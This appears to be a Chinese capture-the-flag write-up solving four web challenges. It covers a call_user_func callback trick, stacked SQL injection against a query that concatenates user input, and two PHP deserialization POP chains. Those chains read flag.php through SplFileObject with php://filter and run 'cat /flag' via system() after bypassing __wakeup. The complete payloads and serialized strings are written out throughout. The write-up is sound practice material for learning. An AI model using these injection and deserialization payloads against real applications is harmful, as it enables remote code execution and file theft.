[SWPUCTF 2022 新生赛]numgame

上调到18时会自动降到-20

设置了一个小障碍,ctrl+u阅读不了源代码,手动view-source

在js下发现一些有用信息,首先是js获取输入框,达到18时会返回-20,然后是下边base64编码解码后为NsScTf.php,尝试访问

给了个hint,与get相似的请求协议是post,包含了hint2.php,下面对传入的参数p进行过滤,黑名单是n,c两个字母,下面有一个比较重要的函数call_user_func

ctf是静态类,回调函数的时候可以使用双冒号运算符

call_user_func(class::function)像这样,本题回调get访问的p,所以在get中写p=类::方法即可

看hint2的提示

源码显示的只有一个类,先尝试get访问

payload:url?p=Nss2::Ctf

发现给出了flag

第一个hint中提示post,则需要数组传参p[]=nss2&p[]=ctf,同样可以获取flag

[suctf 2019]EasySQL

堆叠注入:将多条语句堆叠在一起查询,中间用;隔开

打开题目,发现注入框,采用堆叠语句 //or,order,union,还有报错注入,时间注入,布尔都会报nonono

1
1;show databases#

image-20240809135212838

测试还可以发现如果前面是0后面的字符无回显,考虑后端采用了或运算

先查看表

1
1;show tables;#

表名为Flag,尝试读取字段会报错

后端语句为:select $_POST[‘query’] || flag from Flag

如果输入*,1后,语句变为

select *,1||flag from Flag,又由于或的短路,语句为

select *,1 from Flag,也就是从Flag表中选择所有的列并添加一列,这一列值全为1

payload:*,1

另一种payload

1
1;set sql_mode=PIPES_AS_CONCAT;select 1

这会将||视为concat,也就是把1和flag拼接在一起

[GDOUCTF 2023]反方向的钟

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
    public $name;
    public $rank;
    private $salary;
    public function __construct($name,$rank,$salary = 10000){
        $this->name = $name;
        $this->rank = $rank;
        $this->salary = $salary;
    }
}

class classroom{
    public $name;
    public $leader;
    public function __construct($name,$leader){
        $this->name = $name;
        $this->leader = $leader;
    }
    public function hahaha(){
        if($this->name != 'one class' or $this->leader->name != 'ing' or $this->leader->rank !='department'){
            return False;
        }
        else{
            return True;
        }
    }
}

class school{
    public $department;
    public $headmaster;
    public function __construct($department,$ceo){
        $this->department = $department;
        $this->headmaster = $ceo;
    }
    public function IPO(){
        if($this->headmaster == 'ong'){
            echo "Pretty Good ! Ctfer!\n";
            echo new $_POST['a']($_POST['b']);
        }
    }
    public function __wakeup(){
        if($this->department->hahaha()) {
            $this->IPO();
        }
    }
}

if(isset($_GET['d'])){
    unserialize(base64_decode($_GET['d']));
}
?>

IPO为最后一步,要执行IPO,在wakeup下,要满足this->department->hahaha()为真,hahaha在classroom类里,它的三个条件中rank和name在teacher类里

利用顺序为school类,classroom类,teacher类,并且最后要b64编码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
error_reporting(0);
highlight_file(__FILE__);
// flag.php
class teacher{
    public $name='ing';
    public $rank='department';
   
}


class classroom{
    public $name="one class";
    public $leader;
}

class school{
    public $department;
    public $headmaster  = "ong";
}
$a = new school();
$a->department=new classroom();
$a->department->leader=new teacher();
echo base64_encode(serialize($a));
?>

结果用get传入d参数,IPO类有$_POST['a']($_POST['b'],利用SplFileObject原生类和filter伪协议读取文件

payload

url:

1
http://node5.anna.nssctf.cn:27912/?d=Tzo2OiJzY2hvb2wiOjI6e3M6MTA6ImRlcGFydG1lbnQiO086OToiY2xhc3Nyb29tIjoyOntzOjQ6Im5hbWUiO3M6OToib25lIGNsYXNzIjtzOjY6ImxlYWRlciI7Tzo3OiJ0ZWFjaGVyIjoyOntzOjQ6Im5hbWUiO3M6MzoiaW5nIjtzOjQ6InJhbmsiO3M6MTA6ImRlcGFydG1lbnQiO319czoxMDoiaGVhZG1hc3RlciI7czozOiJvbmciO30=

post:

1
a=SplFileObject&b=php://filter/read=convert.base64-encode/resource=flag.php

base64解码即可

[SWPUCTF 2022 新生赛]ez_1zpop

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
<?php
error_reporting(0);
class dxg
{
   function fmm()
   {
      return "nonono";
   }
}

class lt
{
   public $impo='hi';
   public $md51='weclome';
   public $md52='to NSS';
   function __construct()
   {
      $this->impo = new dxg;
   }
   function __wakeup()
   {
      $this->impo = new dxg;
      return $this->impo->fmm();
   }

   function __toString()
   {
      if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
         return $this->impo->fmm();
   }
   function __destruct()
   {
      echo $this;
   }
}

class fin
{
   public $a;
   public $url = 'https://www.ctfer.vip';
   public $title;
   function fmm()
   {
      $b = $this->a;
      $b($this->title);
   }
}

if (isset($_GET['NSS'])) {
   $Data = unserialize($_GET['NSS']);
} else {
   highlight_file(__file__);
}

dxg类没有用,避免进到dxg需要绕过wakeup

__toString下有个绕过md5,执行fmm需要令impo=new fin()

fin类用来rce命令执行

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
error_reporting(0);

class lt
{
   public $impo='hi';
   public $md51='s155964671a';
   public $md52='s214587387a';

}

class fin
{
   public $a="system";
   public $url="https://www.ctfer.vip";
   public $title = "cat /flag";
}
$a = new lt();
$b = new fin();
$a->impo=$b;
echo serialize($a);
?>
//O:2:"lt":3:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}

绕过wakeup,让序列化中成员数大于实际成员数

paylod:

1
?NSS=O:2:"lt":4:{s:4:"impo";O:3:"fin":3:{s:1:"a";s:6:"system";s:3:"url";s:21:"https://www.ctfer.vip";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:11:"s155964671a";s:4:"md52";s:11:"s214587387a";}